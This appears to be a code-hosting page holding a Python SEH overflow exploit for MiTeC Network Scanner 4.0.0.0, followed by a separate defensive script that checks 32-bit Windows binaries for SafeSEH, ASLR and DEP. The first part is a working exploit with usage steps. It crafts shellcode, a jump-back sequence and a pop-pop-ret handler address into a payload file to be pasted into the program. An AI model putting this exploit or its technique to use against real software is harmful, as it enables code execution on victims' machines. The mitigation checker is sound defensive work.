
71 lines
No EOL
2.1 KiB
Python
Executable file
#!/usr/bin/python
# -*- coding: utf-8 -*-

### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###

# Date: 2016-10-21
# Exploit Author: n30m1nd
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
# Vendor Homepage: http://www.mitec.cz/
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
# Version: 4.0.0.0
# Tested on: Win7 64bit and Win10 64 bit

# Credits
# =======
# PoC by: INSECT.B - http://binsect00.tistory.com
# https://www.exploit-db.com/exploits/39447/
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better

# How to
# ======
# * Run this python script. It will generate an "exploit.txt" file.
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time

# Exploit code
# ============

import struct

# MessageBoxA in NetScan.exe => 004042F1
# Null-byte-free stub: zeroes eax, pushes "pwnd" and the MessageBoxA
# arguments, then XORs eax into 004042F1 and returns into it.
mbox = (
"\x25\x41\x41\x41"
"\x41\x25\x32\x32"
"\x32\x32\x50\x68"
"\x70\x77\x6E\x64"
"\x54\x5F\x50\x57"
"\x57\x50\x35\x8E"
"\x60\x60\x55\x35"
"\x7F\x22\x20\x55"
"\x50\xC3"
)

# JUMP BACK to our shellcode!
nseh = (
# xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
"\x34\x51"
# jne -34h; Jump if ZF = 0 (0xCC = -52 bytes, which lands at the start of mbox)
"\x75\xCC"
)

# pop pop ret => 00402E67
sehh = struct.pack("<L", 0x00402e67)

payl = "A" * (76-48)
payl+= mbox
payl+= "A"*(48-len(mbox))
payl+= nseh + sehh

with open("exploit.txt","wb") as f:
    f.write(payl[:-1])

print payl

"""
NOTE:
The original author of this PoC stated that it was not possible to be
exploited since all addresses inside the binary contain the null byte.
As you can see in this exploit, the null byte is added by default at
the end because strings are null terminated when read from an input
box. This is why we write the payload minus 1 byte, payl[:-1], because
we don't need to write the last null byte for the "pop pop ret" jump
in the "sehh" variable.
"""
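The exploit above works only because the SEH record can be overwritten with a handler address taken from inside NetScan.exe at a fixed load address: the module was built without SafeSEH, ASLR or DEP. The checker below is an added example (not part of the exploit or of the vendor's software) that reads those opt-in flags from a 32-bit PE header, which is the check a defender would run on a third-party binary before trusting it. It parses DllCharacteristics and the Load Config directory's SEHandlerTable/SEHandlerCount fields as documented in the PE/COFF specification; since no real binary can be shipped here, build_sample_pe() constructs a minimal, non-executable PE32 image purely as input for the parser.

```python
import struct

# IMAGE_OPTIONAL_HEADER32.DllCharacteristics bits (winnt.h)
DYNAMIC_BASE = 0x0040   # image may be relocated -> ASLR
NX_COMPAT = 0x0100      # DEP compatible
NO_SEH = 0x0400         # image uses no SEH handlers at all
LOAD_CONFIG_INDEX = 10  # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG


def build_sample_pe(dll_characteristics, seh_handler_count=0):
    """Constructed, minimal PE32 image for testing: one section whose RVA
    equals its file offset, optionally carrying a Load Config directory
    with a SafeSEH handler table. It is not runnable code."""
    sect_off = 0x200
    load_cfg = b""
    if seh_handler_count:
        cfg = bytearray(0x48)
        struct.pack_into("<I", cfg, 0, 0x48)                        # Size
        struct.pack_into("<I", cfg, 0x40, sect_off + 0x60)          # SEHandlerTable RVA
        struct.pack_into("<I", cfg, 0x44, seh_handler_count)        # SEHandlerCount
        load_cfg = bytes(cfg) + b"\0" * (0x60 - 0x48)
        # constructed handler RVAs, sorted as the loader expects
        load_cfg += b"".join(struct.pack("<I", 0x1000 + 0x10 * i)
                             for i in range(seh_handler_count))
    section_data = load_cfg.ljust(0x100, b"\0")

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 28, 0x00400000)                     # ImageBase
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)                             # NumberOfRvaAndSizes
    if load_cfg:
        struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_INDEX, sect_off, 0x48)
    section = struct.pack("<8sIIIIIIHHI", b".rdata", 0x100, sect_off,
                          0x100, sect_off, 0, 0, 0, 0, 0x40000040)
    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + section
    return headers.ljust(sect_off, b"\0") + section_data


def rva_to_offset(data, pe_off, rva):
    """Map an RVA to a file offset using the section table."""
    nsections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    sect = pe_off + 24 + opt_size
    for i in range(nsections):
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, sect + 40 * i + 8)
        if vaddr <= rva < vaddr + max(vsize, rawsize):
            return rva - vaddr + rawptr
    raise ValueError("RVA %#x is not backed by any section" % rva)


def seh_mitigations(data):
    """Report which SEH-overwrite mitigations a PE32 image opts into."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = pe_off + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("SafeSEH tables exist only in PE32 (32-bit) images")
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    has_table, handlers = False, 0
    if ndirs > LOAD_CONFIG_INDEX:
        cfg_rva, cfg_size = struct.unpack_from("<II", data, opt + 96 + 8 * LOAD_CONFIG_INDEX)
        if cfg_rva and cfg_size >= 0x48:
            cfg = rva_to_offset(data, pe_off, cfg_rva)
            table, count = struct.unpack_from("<II", data, cfg + 0x40)
            has_table, handlers = table != 0, count
    no_seh = bool(dllchars & NO_SEH)
    return {
        "aslr": bool(dllchars & DYNAMIC_BASE),
        "dep": bool(dllchars & NX_COMPAT),
        "no_seh": no_seh,
        # the loader only dispatches to registered handlers when either holds
        "safeseh": no_seh or has_table,
        "seh_handlers": handlers,
    }


if __name__ == "__main__":
    # an image like NetScan.exe (no opt-ins) next to a hardened build
    for name, img in (("unprotected", build_sample_pe(0)),
                      ("hardened", build_sample_pe(DYNAMIC_BASE | NX_COMPAT, 3))):
        print(name, seh_mitigations(img))
```

On a real binary, read the file into `data` and call `seh_mitigations(data)`; a result with `safeseh` False and `aslr` False is exactly the condition that lets a pop/pop/ret address such as 00402E67 be reused as an exception handler, and the fix belongs in the vendor's build (linking with /SAFESEH, /DYNAMICBASE and /NXCOMPAT), not in the parser.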